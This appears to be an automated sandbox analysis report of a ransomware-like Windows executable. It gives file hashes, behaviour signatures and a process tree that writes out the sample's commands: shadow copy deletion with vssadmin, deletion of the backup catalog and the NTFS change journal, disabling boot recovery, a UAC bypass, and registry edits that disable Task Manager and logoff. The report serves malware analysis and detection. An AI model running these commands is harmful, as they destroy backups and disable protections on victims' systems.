Analysis

  • max time kernel
    151s
  • max time network
    131s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-11-2022 05:38

General

  • Target

    b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe

  • Size

    1.1MB

  • MD5

    ffc6b559c24b8d82afcb5c01bb5619d9

  • SHA1

    8e068e9c486769716d9685f85687b531ab3a88cf

  • SHA256

    b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0

  • SHA512

    48cf29ecbf184f9d96b9db95190657604c7fb9570046abbeba70d99c6748afbea5f698bb4bb91b1b9b3b3ab7abc56c36a3230aa20c58a99269fe0a4884522191

  • SSDEEP

    24576:NyBzKGHF0bxTCFvXwKk/aISpu4Qc6F3v1HT2BzN2tgGS3YzYho1yWEsWbj28Q5m:AV4xTCzu4Qc6/F8S8bzQ

Malware Config

Signatures

  • Deletes NTFS Change Journal 2 TTPs 1 IoCs

    The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.

  • UAC bypass 3 TTPs 1 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates connected drives 3 TTPs 15 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 15 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
    "C:\Users\Admin\AppData\Local\Temp\b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe"
    1⤵
    • Checks computer location settings
    • Enumerates connected drives
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4880
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service
      2⤵
        PID:4772
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"
        2⤵
          PID:4500
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1008
          • C:\Windows\system32\vssadmin.exe
            vssadmin.exe Delete Shadows /all /quiet
            3⤵
            • Interacts with shadow copies
            PID:2284
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4736
          • C:\Windows\system32\vssadmin.exe
            vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
            3⤵
            • Interacts with shadow copies
            PID:4472
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
          2⤵
            PID:4160
            • C:\Windows\system32\bcdedit.exe
              bcdedit /set {default} recoveryenabled No
              3⤵
              • Modifies boot configuration data using bcdedit
              PID:2072
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
            2⤵
              PID:4196
              • C:\Windows\system32\vssadmin.exe
                vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
                3⤵
                • Interacts with shadow copies
                PID:4024
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2812
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                3⤵
                • Modifies boot configuration data using bcdedit
                PID:4636
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2100
              • C:\Windows\system32\vssadmin.exe
                vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
                3⤵
                • Enumerates connected drives
                • Interacts with shadow copies
                PID:1516
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1852
              • C:\Windows\system32\fsutil.exe
                fsutil.exe usn deletejournal /D C:
                3⤵
                • Deletes NTFS Change Journal
                PID:3184
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=unbounded
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:4516
              • C:\Windows\system32\vssadmin.exe
                vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=unbounded
                3⤵
                • Enumerates connected drives
                • Interacts with shadow copies
                PID:2544
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
              2⤵
                PID:2392
                • C:\Windows\system32\vssadmin.exe
                  vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
                  3⤵
                  • Enumerates connected drives
                  • Interacts with shadow copies
                  PID:2852
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:388
                • C:\Windows\system32\wbadmin.exe
                  wbadmin.exe delete catalog -quiet
                  3⤵
                  • Deletes backup catalog
                  PID:2184
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
                2⤵
                  PID:220
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
                    3⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:2560
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                  2⤵
                    PID:1956
                    • C:\Windows\system32\schtasks.exe
                      schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                      3⤵
                        PID:1756
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
                      2⤵
                        PID:3100
                        • C:\Windows\system32\vssadmin.exe
                          vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
                          3⤵
                          • Enumerates connected drives
                          • Interacts with shadow copies
                          PID:5020
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                        2⤵
                          PID:3772
                          • C:\Windows\system32\reg.exe
                            reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                            3⤵
                            • UAC bypass
                            PID:2044
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=unbounded
                          2⤵
                            PID:1368
                            • C:\Windows\system32\vssadmin.exe
                              vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=unbounded
                              3⤵
                              • Enumerates connected drives
                              • Interacts with shadow copies
                              PID:1344
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
                            2⤵
                              PID:2656
                              • C:\Windows\system32\reg.exe
                                reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
                                3⤵
                                  PID:424
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                2⤵
                                  PID:2736
                                  • C:\Windows\system32\reg.exe
                                    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                    3⤵
                                      PID:4348
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
                                    2⤵
                                      PID:3752
                                      • C:\Windows\system32\vssadmin.exe
                                        vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
                                        3⤵
                                        • Enumerates connected drives
                                        • Interacts with shadow copies
                                        PID:1824
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=unbounded
                                      2⤵
                                        PID:4748
                                        • C:\Windows\system32\vssadmin.exe
                                          vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=unbounded
                                          3⤵
                                          • Interacts with shadow copies
                                          PID:2652
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
                                        2⤵
                                          PID:4332
                                          • C:\Windows\system32\reg.exe
                                            reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
                                            3⤵
                                              PID:4784
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
                                            2⤵
                                              PID:4864
                                              • C:\Windows\system32\vssadmin.exe
                                                vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
                                                3⤵
                                                • Interacts with shadow copies
                                                PID:3252
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
                                              2⤵
                                                PID:5068
                                                • C:\Windows\system32\reg.exe
                                                  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
                                                  3⤵
                                                    PID:3284
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
                                                  2⤵
                                                    PID:832
                                                    • C:\Windows\system32\reg.exe
                                                      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
                                                      3⤵
                                                        PID:3776
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=unbounded
                                                      2⤵
                                                        PID:1332
                                                        • C:\Windows\system32\vssadmin.exe
                                                          vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=unbounded
                                                          3⤵
                                                          • Interacts with shadow copies
                                                          PID:364
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
                                                        2⤵
                                                          PID:4412
                                                          • C:\Windows\system32\reg.exe
                                                            reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
                                                            3⤵
                                                              PID:704
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
                                                            2⤵
                                                              PID:4912
                                                              • C:\Windows\system32\vssadmin.exe
                                                                vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
                                                                3⤵
                                                                • Interacts with shadow copies
                                                                PID:1740
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
                                                              2⤵
                                                                PID:3540
                                                                • C:\Windows\system32\reg.exe
                                                                  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
                                                                  3⤵
                                                                    PID:2172
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
                                                                  2⤵
                                                                    PID:4908
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=unbounded
                                                                    2⤵
                                                                      PID:3400
                                                                      • C:\Windows\system32\vssadmin.exe
                                                                        vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=unbounded
                                                                        3⤵
                                                                        • Interacts with shadow copies
                                                                        PID:3780
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
                                                                      2⤵
                                                                        PID:4904
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
                                                                        2⤵
                                                                          PID:4616
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=unbounded
                                                                          2⤵
                                                                            PID:4356
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
                                                                            2⤵
                                                                              PID:3356
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
                                                                              2⤵
                                                                                PID:5016
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
                                                                                2⤵
                                                                                  PID:2708
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=unbounded
                                                                                  2⤵
                                                                                    PID:4744
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
                                                                                    2⤵
                                                                                      PID:4792
                                                                                  • C:\Windows\system32\vssvc.exe
                                                                                    C:\Windows\system32\vssvc.exe
                                                                                    1⤵
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:2848
                                                                                  • C:\Windows\system32\wbengine.exe
                                                                                    "C:\Windows\system32\wbengine.exe"
                                                                                    1⤵
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:4116
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                    1⤵
                                                                                      PID:3740

                                                                                    Network

                                                                                    MITRE ATT&CK Enterprise v6

                                                                                    Replay Monitor

                                                                                    Loading Replay Monitor...

                                                                                    Downloads